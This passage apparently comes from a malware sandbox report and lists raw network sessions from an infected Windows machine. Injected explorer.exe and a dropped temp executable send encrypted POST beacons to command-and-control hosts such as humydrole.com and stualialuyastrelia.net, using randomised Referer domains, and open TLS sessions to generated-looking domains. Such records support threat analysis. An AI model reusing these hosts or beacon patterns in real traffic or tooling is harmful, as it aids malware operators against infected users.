Dec 22, 2023 21:13:24.531583071 CET	350	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 4e 41 ff ee Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vuNAV1kDsfU]5)=w`MXESY7!#/M,Hd6(MQQB":pq?p1/=s=PzF]4)z
Dec 22, 2023 21:13:25.479867935 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:25 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49798	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:25.815887928 CET	284	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rxvwmsswjqaym.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 324 Host: humydrole.com
Dec 22, 2023 21:13:25.815932989 CET	324	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 22 30 ed b5 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu"0qWPoY!_'45b"\|]]-^f,GoW!xo.OZ~[["g\|+>nG0)FWsRjKS
Dec 22, 2023 21:13:26.850641966 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:26 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49799	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:27.176969051 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vkhpbexnohla.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 119 Host: humydrole.com
Dec 22, 2023 21:13:27.177027941 CET	119	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 21 52 d1 a5 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vu!RDeph)DEm\w
Dec 22, 2023 21:13:29.274153948 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:13:29 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49801	171.25.193.9	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:13:45.680299044 CET	188	OUT	Data Raw: 16 03 01 00 b7 01 00 00 b3 03 03 b0 ca 22 c5 4b e5 7b 5d a4 0b 18 7f c5 e7 f9 33 34 a1 03 62 48 cf f3 9a 6b bf 89 e4 63 07 cd e7 00 00 1c c0 2b c0 2f c0 2c c0 30 c0 0a c0 09 c0 13 c0 14 00 33 00 39 00 2f 00 35 00 0a 00 ff 01 00 00 6e 00 00 00 15 Data Ascii: "K{]34bHkc+/,039/5nwww.kxasgddk.com#
Dec 22, 2023 21:13:45.945205927 CET	1012	IN	Data Raw: 16 03 03 00 39 02 00 00 35 03 03 78 cf a2 6b 9f f7 4f fa d5 52 72 f9 d7 19 7d 43 de 95 26 ae 28 79 40 c0 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 0d ff 01 00 01 00 00 0b 00 04 03 00 01 02 16 03 03 02 56 0b 00 02 52 00 02 4f 00 02 4c 30 82 02 48 30 Data Ascii: 95xkORr}C&(y@DOWNGRD0VROL0H0Xh9=0H0!10Uwww.u77cigfbtci3h3.com0231205000000Z231225000000Z0'1%0#Uwww.hjo3znhoylerxffqovge.net0"0H
Dec 22, 2023 21:13:45.948266029 CET	126	OUT	Data Raw: 16 03 03 00 46 10 00 00 42 41 04 71 b2 8e 07 2f f4 45 3f ec 3f 97 fe d4 8e 4a 1b b4 64 ce 69 20 7f 1e 0d 47 1c ab 25 99 cb 59 44 f6 3a 10 32 16 de 1c c9 b7 fa 72 69 ec ab 0c a8 cd 96 7c d0 b7 85 bf 7e a8 db 77 d7 c1 38 0a d2 14 03 03 00 01 01 16 Data Ascii: FBAq/E??Jdi G%YD:2ri\|~w8(.e^?:w+r=N[4Zc<
Dec 22, 2023 21:13:46.211172104 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 a3 ba 3d 60 64 7b 85 7e cd 7f 3d c1 fb 6d 78 2b 6d 82 b3 93 c8 06 8b c7 ad 0a 58 04 ab b9 b4 e3 cd d3 92 5e e0 c8 b8 48 Data Ascii: (=`d{~=mx+mX^H
Dec 22, 2023 21:13:46.235476971 CET	40	OUT	Data Raw: 17 03 03 00 23 c4 b1 2e 1d 9d da fe 66 3f 82 46 69 c8 01 d3 7b 30 64 e5 5d 2d b1 8b 7a f5 c6 55 c2 7c 52 82 ad f7 70 de Data Ascii: #.f?Fi{0d]-zU\|Rp
Dec 22, 2023 21:13:46.498207092 CET	1286	IN	Data Raw: 17 03 03 08 10 a3 ba 3d 60 64 7b 85 7f e7 a8 e6 83 40 b2 46 25 62 3e 40 4c 87 38 1e 2b 4a 00 2c 34 ef d0 9a 04 95 be ed f2 34 d7 cd 3f d4 9a e6 6c 8b 57 49 f0 fd 3d c8 9f 00 a3 8b 78 3a 15 71 83 76 c9 b5 ae 51 d6 39 f5 e9 c8 cb 41 f0 04 79 2d f7 Data Ascii: =`d{@F%b>@L8+J,44?lWI=x:qvQ9Ay-gO<Q"6yw_o,bA,>jVT^^X/(3i!u\Z\|VY/~eA4;:AJs\mTxrDuc9
Dec 22, 2023 21:13:46.498222113 CET	783	IN	Data Raw: 8f 59 5b a6 0c 93 cf 1a 82 8b 43 69 69 81 50 ae c8 02 0d 51 31 38 37 40 ec 65 fa 03 18 0d 59 a9 48 70 33 62 a7 2a 34 4a be ce 4e d5 3b 14 3a b3 a4 27 1c bf 6a 58 43 ca 4f 77 1d 87 29 5c db f4 af 09 f3 bb 7d 8b 0d ff a4 99 2a 60 bb e2 d0 6b 27 e7 Data Ascii: Y[CiiPQ187@eYHp3b4JN;:'jXCOw)\}`k'lPJUGcs:(/yA)rfW@'lAmvV;wB^W:>Woa?P%il}+W5u}"o@,JYauiIR\|s<cff
Dec 22, 2023 21:13:46.509370089 CET	1057	OUT	Data Raw: 17 03 03 04 1c c4 b1 2e 1d 9d da fe 67 43 6d 89 62 90 d2 bc 8d 6d 4a 84 6d 47 cf 2f 74 d7 a4 a0 d2 e3 c2 b8 83 e4 ec 80 0d 4d 29 30 5d 0e 81 52 b7 29 cd 82 68 c1 21 df fa ce 21 86 67 de 5c d9 ec 02 83 1b 8d b7 96 e5 59 54 5f 3b 4d 3e 48 5c d3 66 Data Ascii: .gCmbmJmG/tM)0]R)h!!g\YT_;M>H\f[nf\|}G9s?\,Z~:fm"db!`U?g~A!od6/$Yx]Vg9;m~S wdUcx-;09
Dec 22, 2023 21:13:46.773432970 CET	543	IN	Data Raw: 17 03 03 02 1a a3 ba 3d 60 64 7b 85 80 3d ce 69 74 de ec 4f 1b 05 1c 27 3b 43 bd 7e d6 e4 f4 93 17 64 64 cb eb 20 ac 57 2a d4 56 8c 0f 65 f7 be 77 80 a0 86 6d 4e 11 91 f3 34 6a 6b ce 1b 10 86 6a dd 10 1a 8a 47 ee e4 d0 3e a5 1a 8c ca f6 b6 a4 ea Data Ascii: =`d{=itO';C~dd W*VewmN4jkjG>w/-BKC)\|!2"$!MG!VB"^)'\`Upne\O4S4F]qD[mD)/JmC?Lr">\4K[Gy`S/
Dec 22, 2023 21:13:46.781990051 CET	1057	OUT	Data Raw: 17 03 03 04 1c c4 b1 2e 1d 9d da fe 68 5a e6 5e a0 47 6d 29 34 39 bc 80 c6 b1 f5 77 e1 01 ff 0e 73 7f f7 1e 39 40 e5 cf 16 c4 ac 40 80 ad cc b1 61 a9 5c 0f 61 37 c6 f5 9b c6 16 7d 32 7f 94 28 1d 17 dd fd 72 6b 37 c3 8a 91 39 69 07 86 3a e8 6a c9 Data Ascii: .hZ^Gm)49ws9@@a\a7}2(rk79i:jUnl.)V;n;jkm{#~fIA>I@U/W>NXE@3Euc^m(`-BsMg\;2EN,MCU\|ovWr=q]_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49806	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:03.823890924 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hbgskvamhyw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 22, 2023 21:14:03.823928118 CET	109	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bONfy&5c50
Dec 22, 2023 21:14:04.111489058 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:14:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49816	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:12.965343952 CET	283	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lhxarjqpduvpxtwl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 22, 2023 21:14:12.965373993 CET	109	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bONfy&5c50
Dec 22, 2023 21:14:13.256434917 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:14:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49818	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:20.264339924 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://axmreqedlxubwy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 22, 2023 21:14:20.264408112 CET	109	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bONfy&5c50
Dec 22, 2023 21:14:20.554176092 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:14:20 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49822	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:27.028105974 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tuuqpbahehw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 22, 2023 21:14:27.028162003 CET	109	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bONfy&5c50
Dec 22, 2023 21:14:27.322076082 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:14:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49823	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:37.228796005 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dsdfpesmqhe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 22, 2023 21:14:37.228831053 CET	109	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bONfy&5c50
Dec 22, 2023 21:14:37.522099018 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:14:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49824	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:43.455338955 CET	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hndbupufneq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: humydrole.com
Dec 22, 2023 21:14:43.455390930 CET	323	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 64 06 e5 ea Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA .[k,vudh$}s>ktUOnv"h@:U=!85*eOQ"5H[Tr'">mLzC`{t3@:}4 5N6
Dec 22, 2023 21:14:44.063941956 CET	252	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:14:43 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 85 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49826	2.180.10.7	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:44.404694080 CET	285	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jwpdykhxikqtrs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 284 Host: humydrole.com
Dec 22, 2023 21:14:44.404722929 CET	284	OUT	Data Raw: 3b 6e 25 19 8d ce 61 20 dd aa c9 0b 0f 70 0c b9 7b 02 c0 e7 63 07 97 62 7b 7f 0e e6 42 c1 c2 6e 9b 5c ce 2e 0f 1e 2b 6c 9b ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 78 3a c0 83 Data Ascii: ;n%a p{cb{Bn\.+l? 9Yt M@NA -[k,vux:4e\pm5b?V4:}1CZ2EpfX";\#O>xN1,_oMCA'[HD2>D\:*F#T9
Dec 22, 2023 21:14:46.454550982 CET	587	IN	HTTP/1.0 404 Not Found Date: Fri, 22 Dec 2023 20:14:46 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49827	91.215.85.17	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:14:44.446902990 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qncgxuathxpbm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 22, 2023 21:14:44.446952105 CET	109	OUT	Data Raw: 48 9d 88 c4 40 62 24 25 5c 02 56 2f 77 ab 56 c0 2d 6c eb 1b 88 1e ab df b7 61 d5 8c 05 f0 df e2 85 a8 80 b1 7d 42 ee b7 d6 2c 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: H@b$%\V/wV-la}B,j~_=;}f=B!bONfy&5c50
Dec 22, 2023 21:14:44.737061977 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:14:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	53731	3.94.41.167	80	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
